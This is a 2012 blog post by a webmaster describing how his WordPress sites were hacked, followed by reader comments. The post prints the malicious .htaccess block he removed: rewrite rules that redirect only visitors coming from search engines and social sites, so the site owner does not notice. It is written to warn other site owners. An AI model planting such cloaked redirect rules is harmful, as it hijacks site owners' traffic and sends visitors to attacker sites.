First time my websites got hacked a week back and got it resolved today. Thought I should share this.

Events on Timeline

Feb. 24th, 2012 – I noticed the traffic dipped from 50 visitors per day to 1 visitor per day in my Google adsense and analytics for one of my main site. Basically my Search Engine Traffic went to zero. I made sure my site was not deindexed and the ranking was there. So I thought may be a problem in Google stats.

Feb. 25th, 2012 – I noticed the same effect for some of my other top performing sites. In fact this happened from Feb. 24th itself.

Feb. 26-29th, 2012 – I was caught up in other works and didn’t follow this problem though I kept checking the stats. I found the same kind of traffic dip in my Awstats as well.

Mar. 1, 2012 – I was confused and I wanted to know why all my search engine traffic(from google, yahoo, bing etc) have vaporized.  I did the following.

1. I checked my main site to see if it is loading properly and displaying the adsense ads. Yes everything was fine there.

2. I checked if my site’s main page and other pages were still indexed in Google, Yahoo & Bing. Yes it was there.

3. I made sure the site was still ranking on the first page which it did.

4. I also made sure my adsense ads & analytics code was embedded in my site by looking at the page’s source code. You know how to do it, don’t you.  In firefox go to Tools->Web Developer->Page Source.

Mar. 2, 2012 – My adsense revenue & traffic was zero. I had enough of it and I made up my mind to fix it today no matter what. I went to Google and searched the keyword for which I rank third. I clicked my site on the SERP. Boom my site got redirected to “http://bamosa dot ru”. The same effect for all my other sites as well.

How I fixed the Problem

I went into digging it further. My site gets loaded properly when I type the url but only when I go from the search engines it gets redirected. I know I have to mess around with the .htaccess file.

To know how to edit your .htaccess file go to

I went through my cpanel to take a look at my .htaccess file. There I saw the code which redirects my site to another site when my site is referred from Google, Yahoo, Bing, Alexa etc etc.

I removed the following code from my .htaccess file and everything is back to normal.

“RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ [R=301,L]

ErrorDocument 400
ErrorDocument 401
ErrorDocument 403
ErrorDocument 404
ErrorDocument 500 “


My Observations

1.  Only my WordPress sites got affected.

2. I am not alone. Because the traffic for http://bamosa dot ru in the last week of Feb. 2012 and the ranking is close to 20K. My fellow domainers and webmasters need to check their sites for the same hack.

3. This is a clever hack. Since only my search engine traffic was hacked, I thought may be some glitch in the analytics code or something of that sort. That dragged my action time and in the process I lost a week’s traffic and revenue.


10 Comments to “First Time My Websites Got Hacked”

  1. RH says:

    Thanks for the post,very interesting and I had no idea that only search could be affected.

  2. sympathizer says:

    Your site is also redirecting to a site if you click your site from and even going to your site directly using android.

  3. Kumaran says:

    Thanks for the heads up. Fixed it and should work now.

  4. John says:

    Was the attribute of the .htaccess read only. It if wasn’t, perhaps that’s how the hacker got to it.

  5. Kumaran says:

    Write permission is only for the registered user and only the admin is the registered user as of now.

  6. John says:

    This is the second time I hear about WordPress being hacked. Perhaps they are not as secured as claimed to be. Time to consider other CMS option like Drupal? That thing is rock solid but harder to work/manage with.

  7. your reader move away again from your…

    blog, faster than the average driver hits the horn when the light turns green in haifa? (i can assure you – that is really fast!)you need to grab your reader’s attention, and you only got one change with your headline. so…

  8. gary says:

    very handy tips to get round the hackers, cheers

  9. GSElectrical says:

    thanks for the heads up

  10. Mike says:

    Did you ever figure out how they changed your htaccess? Are you on shared hosting?

Leave a Reply

You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>